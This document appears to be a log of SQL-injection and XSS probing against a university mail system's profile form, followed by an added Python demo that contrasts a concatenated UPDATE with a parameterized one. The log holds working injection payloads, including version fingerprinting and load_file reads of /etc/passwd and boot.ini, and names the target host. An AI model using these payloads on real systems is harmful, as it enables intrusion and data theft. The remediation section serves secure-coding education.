First, a blind test, entering the following in turn:
><script>alert("ok!");</script
><? phpinfo(); ?
")"/\
Information obtained:
1. Everything after the > is placed after the </input> tag
2. The SQL statement is: UPDATE user SET name='$post' where id =xxxxxx@mails.jlu.edu.cn'
3. PHP code is commented out as <!--? phpinfo(); ?-->
The test log follows:
1.summer1' where name="3" and exists(select * from dual) # #'
2.summer2',name=@ver where name="summer22" and (select @ver:=substring('2011-11-17',1)) # #'
Proves the backend is MySQL
3.summer2',name=@ver where name="summer1" and (select @ver:=version()) # #'
Obtained version number 4.1.20
4.summer2',name=@ver where name="4.1.20" and (select @ver:=DATABASE() ) # #'
Execution failed
summer2',name=@ver where name="4.1.20" and (select @ver:=user() ) # #'
Execution failed
5.summer2',name=@ver where name="4.1.20" and (select @ver:=load_file("/etc/passwd") ) # #'
Execution failed
summer2',name=@ver where name="4.1.20" and (select @ver:=load_file("c:\\boot.ini") ) # #'
Execution failed
6.summer1' where name="summer2" and EXISTS(SELECT column_name from information_schema.columns) # #'
err:Access denied for user 'mail'@'10.100.108.4' to database 'information_schema'
7.summer1' where passwd="new234567" # #'
None of the columns password, passwd, pw, id, uid, email, mail, email_id exist
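The root cause behind every entry above is the UPDATE in item 2 being assembled by string concatenation, so a single quote in $post closes the name literal and the rest of the input rewrites the WHERE clause. The following is an added example, not code from the page or from the mail system it tests; it uses Python with an in-memory SQLite table (a constructed stand-in for the page's MySQL 4.1.20 user table) and a constructed payload in the same shape as the page's test entries, with -- in place of MySQL's # because SQLite has no # comment. It shows the concatenated UPDATE modifying a different user's row, and the parameterized UPDATE storing the same input as a harmless literal.

```python
import sqlite3

# Constructed sample table standing in for the page's `user` table.
SCHEMA = "CREATE TABLE user (id TEXT PRIMARY KEY, name TEXT)"
ROWS = [("alice@example.invalid", "Alice"), ("bob@example.invalid", "Bob")]

# Constructed payload shaped like the page's entries: close the literal,
# replace the WHERE clause, comment out the application's own WHERE.
PAYLOAD = "x' WHERE id='bob@example.invalid' -- "


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO user VALUES (?, ?)", ROWS)
    conn.commit()
    return conn


def update_name_vulnerable(conn, user_id, post):
    # Mirrors the page's UPDATE user SET name='$post' where id='...'
    # built by string interpolation: the input becomes part of the SQL.
    sql = "UPDATE user SET name='%s' WHERE id='%s'" % (post, user_id)
    cur = conn.execute(sql)
    conn.commit()
    return sql, cur.rowcount


def update_name_safe(conn, user_id, post):
    # Same statement with bound parameters: the driver sends the input as
    # data, so quotes and comment markers cannot change the statement.
    sql = "UPDATE user SET name=? WHERE id=?"
    cur = conn.execute(sql, (post, user_id))
    conn.commit()
    return sql, cur.rowcount


def names(conn):
    # Snapshot of the table as {id: name}, used to compare the two runs.
    return dict(conn.execute("SELECT id, name FROM user ORDER BY id"))


def demo(user_id="alice@example.invalid", post=PAYLOAD):
    # Run the same request against two fresh copies of the table and
    # return (rows after vulnerable update, rows after safe update,
    # rowcount of each update).
    conn = fresh_db()
    _, vuln_count = update_name_vulnerable(conn, user_id, post)
    vuln_rows = names(conn)

    conn = fresh_db()
    _, safe_count = update_name_safe(conn, user_id, post)
    safe_rows = names(conn)
    return vuln_rows, safe_rows, vuln_count, safe_count


if __name__ == "__main__":
    vuln_rows, safe_rows, vuln_count, safe_count = demo()
    print("concatenated:", vuln_rows, "rows affected:", vuln_count)
    print("parameterized:", safe_rows, "rows affected:", safe_count)
```

Note that both updates report one affected row, so an affected-row check on the application side does not reveal that the wrong row was touched; the fix is the bound parameter, not a count. The same applies to the page's name=@ver trick: with a placeholder, "summer2',name=@ver where ..." is simply stored as the new name.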